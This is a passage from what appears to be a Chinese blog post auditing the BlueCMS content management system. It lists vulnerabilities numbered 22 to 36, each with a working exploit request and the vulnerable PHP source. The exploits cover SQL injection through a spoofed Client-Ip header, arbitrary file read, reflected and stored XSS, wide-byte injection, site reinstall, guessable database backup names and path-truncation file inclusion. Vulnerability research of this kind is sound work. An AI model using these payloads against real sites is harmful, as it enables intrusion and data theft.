			$message = preg_replace("/\[email(=([a-z0-9\-_.+]+)@([a-z0-9\-_]+[.][a-z0-9\-_.]+))?\](.+?)\[\/email\]/ies", "\$this->parseemail('\\1', '\\4')", $message);
		}
		$message = str_replace(array(
			'[/color]', '[/size]', '[/font]', '[/align]', '[b]', '[/b]',
			'[i]', '[/i]', '[u]', '[/u]', '[list]', '[list=1]', '[list=a]',
			'[list=A]', '[*]', '[/list]', '[indent]', '[/indent]', '[/float]'
		), array(
			'</font>', '</font>', '</font>', '</p>', '<strong>', '</strong>', '<i>',
			'</i>', '<u>', '</u>', '<ul>', '<ul type="1">', '<ul type="a">',
			'<ul type="A">', '<li>', '</ul>', '<blockquote>', '</blockquote>', '</span>'
		), preg_replace(array(
			"/\[color=([#\w]+?)\]/i",
			"/\[size=(\d+?)\]/i",
			"/\[size=(\d+(\.\d+)?(px|pt|in|cm|mm|pc|em|ex|%)+?)\]/i",
			"/\[font=([^\[\<]+?)\]/i",
			"/\[align=(left|center|right)\]/i",
			"/\[float=(left|right)\]/i"
		), array(
			"<font color=\"\\1\">",
			"<font size=\"\\1\">",
			"<font style=\"font-size: \\1\">",
			"<font face=\"\\1 \">",
			"<p align=\"\\1\">",
			"<span style=\"float: \\1;\">"
		), $message));
		if(strpos($message, '[/quote]') !== FALSE) {
			$message = preg_replace("/\s*\[quote\][\n\r]*(.+?)[\n\r]*\[\/quote\]\s*/is", $this->tpl_quote(), $message);
		}
		if(strpos($message, '[/img]') !== FALSE) {
			$message = preg_replace(array(
				"/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/ies",
				"/\[img=(\d{1,4})[x|\,](\d{1,4})\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/ies"
			), array(
				"\$this->bbcodeurl('\\1', '<img src=\"%s\" border=\"0\" alt=\"\" />')",
				"\$this->bbcodeurl('\\3', '<img width=\"\\1\" height=\"\\2\" src=\"%s\" border=\"0\" alt=\"\" />')"
			), $message);
		}
		for($i = 0; $i <= $this->uccode['pcodecount']; $i++) {
			$message = str_replace("[\tUCENTER_CODE_$i\t]", $this->uccode['codehtml'][$i], $message);
		}
		return nl2br(str_replace(array("\t", '   ', '  '), array('&nbsp; &nbsp; &nbsp; &nbsp; ', '&nbsp; &nbsp;', '&nbsp;&nbsp;'), $message));
	}

22、comment.php 113行处存在sql注入漏洞

Exp:http://127.0.0.3/bluecms/comment.php?act=send&id=1 Post:mood=1&comment=hhh&type=1 Client-Ip:1','1'),('','1','1','1','1',database(),'1','1

elseif($act == 'send')
{
	if(empty($id))
	{
 		return false;
 	}

 	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
 	$mood = intval($_POST['mood']);
 	$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
 	$content = nl2br($content);
 	$type = intval($_POST['type']);
 	if(empty($content))
 	{
 		showmsg('评论内容不能为空');
 	}
 	if($_CFG['comment_is_check'] == 0)
 	{
 		$is_check = 1;
 	}
 	else
 	{
 		$is_check = 0;
 	}

 	$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) 
 			VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";
 	$db->query($sql);
 	if($type == 1)
 	{
 		$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
 	}
 	elseif($type == 0)
 	{
 		$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
 	}
	if($_CFG['comment_is_check'] == 1)
	{
		showmsg('请稍候,您的评论正在审核当中...','comment.php?id='.$id.'&type='.$type);
	}
	else
	{
		showmsg('发布评论成功','comment.php?id='.$id.'&type='.$type);
	}
}

23、user.php 112行处存在任意文件读取漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=do_login Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_login

 elseif($act == 'do_login'){
 	$user_name  	= 	!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
 	$pwd 			= 	!empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
 	$safecode   	= 	!empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
 	$useful_time	=	intval($_POST['useful_time']);
 	$from = !empty($from) ? base64_decode($from) : 'user.php';

 	if($user_name == ''){
 		showmsg('用户名不能为空');
 	}
 	if($pwd == ''){
 		showmsg('密码不能为空');
 	}
 	if($safecode == '' || strtolower($safecode) != strtolower($_SESSION['safecode'])){
 		showmsg('验证码错误');
 	}
	$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$user_name'");
	if($row['num'] == 1){
		showmsg('系统用户组不能从前台登录');
	}
	$w = login($user_name, $pwd);

	if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php')){
		list($uid, $username, $password, $email) = uc_user_login($user_name, $pwd);
		if($uid>0){
			$password = md5($password);
			if(!$w){
				$db->query("INSERT INTO ".table('user')." (user_name, pwd, email, reg_time) VALUES ('$username', '$password', '$email', '$timestamp')"); 
				$w = 1;
			}
			$ucsynlogin = uc_user_synlogin($uid);
		}
		elseif($uid === -1){
			if($w){
				$user_info = $db->getone("SELECT email FROM ".table('user')." WHERE user_name='$user_name'");
				$uid = uc_user_register($user_name, $pwd, $user_info['email']);
				if($uid > 0) $ucsynlogin = uc_user_synlogin($uid);
			}else $w = -1;
		}
	}
	if($w == -1 || $w==0){
		showmsg('您输入的用户名和密码不正确');
	}
	if($w){
		update_user_info($user_name);
 		if($useful_time !=0){
 			setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+$useful_time, $cookiepath, $cookiedomain);
 			setcookie('BLUE[user_name]', $user_name, time()+$useful_time, $cookiepath, $cookiedomain);
			setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+$useful_time, $cookiepath, $cookiedomain);
 		}
		echo $ucsynlogin;
 		showmsg('欢迎您 '.$user_name.' 回来,现在将转到...', $from);
	}
 }

24、user.php 206行处存在任意文件读取漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:referer=&user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=1%40qq.com&safecode=s43f&from={base64(文件地址)}&act=do_reg

 elseif($act == 'do_reg'){
	$user_name 		=	!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
	$pwd       		= 	!empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
	$pwd1 	   		= 	!empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
	$email     		= 	!empty($_POST['email']) ? trim($_POST['email']) : '';
	$safecode  		= 	!empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
	$from = !empty($from) ? base64_decode($from) : 'user.php';

	if(strlen($user_name) < 4 || strlen($user_name) > 16){
		showmsg('用户名字符长度不符');
	}
	if(strlen($pwd) < 6){
		showmsg('密码不能少于6个字符');
	}
	if($pwd != $pwd1){
		showmsg('两次输入密码不一致');
	}
	if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
		showmsg('验证码错误');
	}
	if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
		showmsg('该用户名已存在');
	}
	if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
		showmsg('该用户名已存在');
	}
	$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
	if(!$db->query($sql)){
		showmsg('很遗憾,注册中出错啦');
	}else{
		$_SESSION['user_id'] = $db->insert_id();
		$_SESSION['user_name'] = $user_name;
		update_user_info($_SESSION['user_name']);
		setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
		if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
		{
		$uid = uc_user_register($user_name, $pwd, $email);
		if($uid <= 0)
		{
			if($uid == -1)
			{
				showmsg('用户名不合法!');
			}
			elseif($uid == -2)
			{
				showmsg('包含不允许注册的词语!');
			}
			elseif($uid == -3)
			{
				showmsg('你指定的用户名 '.$user_name.' 已存在,请使用别的用户名!');
			}
			elseif($uid == -4){
				showmsg('您使用的Email格式不对!');
			}
			elseif($uid == -5)
			{
				showmsg('你使用的Email 不允许注册!');
			}
			else
			{
				showmsg('注册失败!');
			}
		}
		else
		{
			$ucsynlogin = uc_user_synlogin($uid);
			echo $ucsynlogin;
		}
		}
		$_SESSION['last_reg'] = $timestamp;
		showmsg('恭喜您注册成功,现在将转向...', $from);
	}
 }

25、user.php 130行处存在反射型XSS漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=reg&from="/><script>alert(1);</script>"

elseif($act == 'reg')
{
	if (!empty($_SESSION['user_id']) && $_SESSION['user_id'] != 1)
	{
		showmsg('您已经登录,请先退出登录再注册!');
	}
	if (!isset($_SESSION['last_reg']))
	{
		$_SESSION['last_reg'] = 0;
	}
	elseif ($timestamp - $_SESSION['last_reg'] < 30) 
	{
		showmsg('为防止恶意注册,请于30秒后再来注册!');
	}
	template_assign(array('current_act', 'from'), array('注册新用户', $from));
 	$smarty->display('reg.htm');
}

26、user.php 58行处存在反射型XSS漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=login&from="/><script>alert(1);</script>"

 elseif($act == 'login'){
	
 	if($_SESSION['user_id']){
 		showmsg('您已经登录,不需要重新登录', 'user.php');
 	}
	template_assign(array('current_act', 'from'), array('登录', $from));
	$smarty->display('login.htm');
 }

27、user.php 772行存在储存型XSS漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg

elseif($act == 'edit_user_info'){
	 $user_id = intval($_SESSION['user_id']);
	 if(empty($user_id)){
		 return false;
	 }
	$birthday = trim($_POST['birthday']);
	$sex = intval($_POST['sex']);
    $email = !empty($_POST['email']) ? trim($_POST['email']) : '';
    $msn = !empty($_POST['msn']) ? trim($_POST['msn']) : '';
    $qq = !empty($_POST['qq']) ? trim($_POST['qq']) : '';
    $mobile_phone = !empty($_POST['mobile_phone']) ? trim($_POST['mobile_phone']) : '';
    $office_phone = !empty($_POST['office_phone']) ? trim($_POST['office_phone']) : '';
    $home_phone   = !empty($_POST['home_phone']) ? trim($_POST['home_phone']) : '';
	$address = !empty($_POST['address']) ? htmlspecialchars($_POST['address']) : '';

	if (!empty($_POST['face_pic1'])){
        if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){
           showmsg('只支持本站相对路径地址');
         }
        else{
           $face_pic = trim($_POST['face_pic1']);
        }
    }else{
		if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){
			@unlink(BLUE_ROOT.$_POST['face_pic3']);
		}
	}

	if(isset($_FILES['face_pic2']['error']) && $_FILES['face_pic2']['error'] == 0){
		$face_pic = $image->img_upload($_FILES['face_pic2'],'face_pic');
	}
    $face_pic = empty($face_pic) ? '' : $face_pic;

	$sql = "UPDATE ".table('user')." SET birthday = '$birthday', sex = '$sex', face_pic = '$face_pic', email = '$email', msn = '$msn', qq = '$qq'," .
			" mobile_phone = '$mobile_phone', office_phone = '$office_phone', home_phone = '$home_phone', address='$address' WHERE user_id = ".intval($_SESSION['user_id']);
	$db->query($sql);
	showmsg('更新个人资料成功', 'user.php');
 }

28、user.php 134行存在储存型XSS漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=do_reg Post:user_name=hhhhh&pwd=KpKvtmXyZLkD6uY&pwd1=KpKvtmXyZLkD6uY&email=from=<script>alert(1);</script>&safecode=s43f&from=}&act=do_reg

 elseif($act == 'do_reg'){
	$user_name 		=	!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
	$pwd       		= 	!empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
	$pwd1 	   		= 	!empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
	$email     		= 	!empty($_POST['email']) ? trim($_POST['email']) : '';
	$safecode  		= 	!empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
	$from = !empty($from) ? base64_decode($from) : 'user.php';

	if(strlen($user_name) < 4 || strlen($user_name) > 16){
		showmsg('用户名字符长度不符');
	}
	if(strlen($pwd) < 6){
		showmsg('密码不能少于6个字符');
	}
	if($pwd != $pwd1){
		showmsg('两次输入密码不一致');
	}
	if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
		showmsg('验证码错误');
	}
	if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
		showmsg('该用户名已存在');
	}
	if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
		showmsg('该用户名已存在');
	}
	$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
	if(!$db->query($sql)){
		showmsg('很遗憾,注册中出错啦');
	}else{
		$_SESSION['user_id'] = $db->insert_id();
		$_SESSION['user_name'] = $user_name;
		update_user_info($_SESSION['user_name']);
		setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
		if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
		{
		$uid = uc_user_register($user_name, $pwd, $email);
		if($uid <= 0)
		{
			if($uid == -1)
			{
				showmsg('用户名不合法!');
			}
			elseif($uid == -2)
			{
				showmsg('包含不允许注册的词语!');
			}
			elseif($uid == -3)
			{
				showmsg('你指定的用户名 '.$user_name.' 已存在,请使用别的用户名!');
			}
			elseif($uid == -4){
				showmsg('您使用的Email格式不对!');
			}
			elseif($uid == -5)
			{
				showmsg('你使用的Email 不允许注册!');
			}
			else
			{
				showmsg('注册失败!');
			}
		}
		else
		{
			$ucsynlogin = uc_user_synlogin($uid);
			echo $ucsynlogin;
		}
		}
		$_SESSION['last_reg'] = $timestamp;
		showmsg('恭喜您注册成功,现在将转向...', $from);
	}
 }

29、guest_book.php 67行处存在sql注入漏洞

Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1',user())#

elseif ($act == 'send')
{
	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
	$rid = intval($_POST['rid']);
 	$content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';
 	$content = nl2br($content);
 	if(empty($content))
 	{
 		showmsg('评论内容不能为空');
 	}
	$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content) 
			VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";
	$db->query($sql);
	showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);
}

30、guest_book.php 67行处存在储存型XSS漏洞

Exp:http://127.0.0.3/bluecms/comment.php?act=send Post:content=hhh Client-Ip:1','<script>alert(1);</script>')#

elseif ($act == 'send')
{
	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
	$rid = intval($_POST['rid']);
 	$content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : '';
 	$content = nl2br($content);
 	if(empty($content))
 	{
 		showmsg('评论内容不能为空');
 	}
	$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content) 
			VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";
	$db->query($sql);
	showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);
}

31、admin/arc_cat.php 27行处存在储存型XSS漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=do_add Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3

 elseif($act == 'do_add'){
 	$cat_name = trim($_POST['cat_name']);
 	$parent_id = intval($_POST['parent_id']);
 	$title = !empty($_POST['title']) ? trim($_POST['title']) : '';
 	$keywords = !empty($_POST['keywords']) ? trim($_POST['keywords']) : '';
 	$description = !empty($_POST['description']) ? trim($_POST['description']) : '';
 	$show_order = !empty($_POST['show_order']) ? intval($_POST['show_order']) : '';
 	if($parentid == 0){
 		$cat_indent = 0;
 	}else{
 		$cat_indent = get_catindent($parentid)+1;
 	}

	$sql = "INSERT INTO ".table('arc_cat')." (cat_id, cat_name, parent_id, title, keywords, description, cat_indent, is_havechild, show_order ) VALUES ('', '$cat_name', '$parent_id', '$title', '$keywords', '$description', '$cat_indent', '0', '$show_order')";
	if(!$db->query($sql)){
		showmsg('添加栏目出错', true);
	}else{
		$sql = "UPDATE ".table('arc_cat')." SET is_havechild='1' where cat_id=$parent_id";
		if(!$db->query($sql)){
			showmsg('更新栏目出错','arc_cat.php', true);
			$db->query("DELETE FROM ".table('arc_cat')." WHERE cat_id=$cat_id");
		}
		showmsg('添加栏目成功','arc_cat.php?pid='.$parent_id, true);
	}
 }

32、admin/arc_cat.php 53行处存在储存型XSS漏洞

Exp:http://127.0.0.3/bluecms/user.php?act=edit Post:cat_name='<script>alert(1);</script>'&show_order=0&parent_id=1&title=1&keywords=1description=3

 elseif($act == 'edit'){
 	$sql = "SELECT cat_id, cat_name, parent_id, title, keywords, description, show_order FROM ".table('arc_cat')." WHERE cat_id = $cid";
	$cat = $db->getone($sql);

	template_assign(array('cat', 'act', 'current_act'), array($cat, $act, '编辑栏目'));
	$smarty->display('arc_cat_info.htm');
 }

33、宽字节注入漏洞(若设置数据库编码为GBK)

则可利用%df’) or 1=1#')来实现任意sql查询点的注入漏洞

34、网站重装漏洞

由于程序错误导致lock文件未能写入,导致了该漏洞

( ! ) Fatal error: Cannot redeclare class Smarty in D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\smarty\Smarty.class.php on line 65
Call Stack
#	Time	Memory	Function	Location
1	0.0071	173304	{main}( )	...\index.php:0
2	2.6150	397072	require_once( 'D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\common.inc.php' )	...\index.php:154
3	21.8121	808544	require( 'D:\phpstudy_pro\WWW\127.0.0.3\bluecms\include\smarty\Smarty.class.php' )	...\common.inc.php:66

35、数据库备份爆破漏洞

由于备份文件的命名仅为日期,如20240707.sql,则可以简单爆破获得数据库备份文件名。且数据库备份路径未进行限制访问,造成了数据库备份的下载漏洞。
$file = date("Ymd", time()).'.sql';

elseif ($act == 'do_backup')
{
	if (!is_writable(BLUE_ROOT.DATA."backup/"))
	{
 		showmsg('备份文件存放目录data/backup不可写');
 	}
 	$limit_size = !empty($_POST['limit_size']) ? intval($_POST['limit_size']) : '2048';
	$mysql_type = !empty($_POST['mysql_type']) ? trim($_POST['mysql_type']) : '';
 	$file = date("Ymd", time()).'.sql';
 	$version = BLUE_VERSION;
	$db_version = $db->dbversion();
	$add_time = date("Y-m-d H:i:s");
	$sql .= "--BlueCMS VERSION:".$version."\r\n".
			"--Mysql VERSION:".$db_version."\r\n".
			"--Create time:".$add_time."\r\n";
 	$num = 1;
	if($_POST['tables'])
	{
		foreach($_POST['tables'] as $val)
		{
			$sql .= write_head($val);
			if ($mysql_type == 'mysql40' && $db_version > 4.0)
			{
				$sql = preg_replace('/ENGINE=MyISAM(.*)/','TYPE=MyISAM', $sql); 
			}
			elseif($mysql_type == 'mysql41' && $db_version < 4.1)
			{
				$sql = preg_replace('/TYPE=MyISAM/', 'EMGINE=MyISAM DEFAULT CHARSET='.BLUE_CHARSET, $sql);
			}

			$row = $db->getone("SELECT COUNT(*) AS num FROM ".$val);
			if($row['num'] > 0)
			{
				$sql .= write_data($val);
			}
			if (strlen($sql) >= $limit_size * 1000)
			{
				$file = date("Ymd", time()).'_'.$num.'.sql';
				if (!write_file(BLUE_ROOT.DATA.'backup/'.$file, $sql))
				{
					showmsg('备份数据库卷-'.$num.'失败');
				}
				else
				{
					$msg .= '生成备份文件 '.$file.' 成功<br/>';
				}
				$num++;
				$file = date("Ymd", time());
				$sql = '';
			}
 		}
	}

36、user.php 742行处存在任意文件包含漏洞(仅在php5.2下有效)

Exp:http://127.0.0.3/bluecms/user.php?act=pay Post:pay=1.txt......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

elseif ($act == 'pay'){
 	include 'data/pay.cache.php';
 	$price = $_POST['price'];
 	$id = $_POST['id'];
 	$name = $_POST['name'];
 	if (empty($_POST['pay'])) {
 		showmsg('对不起,您没有选择支付方式');
 	}
 	include 'include/payment/'.$_POST['pay']."/index.php";

 }
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值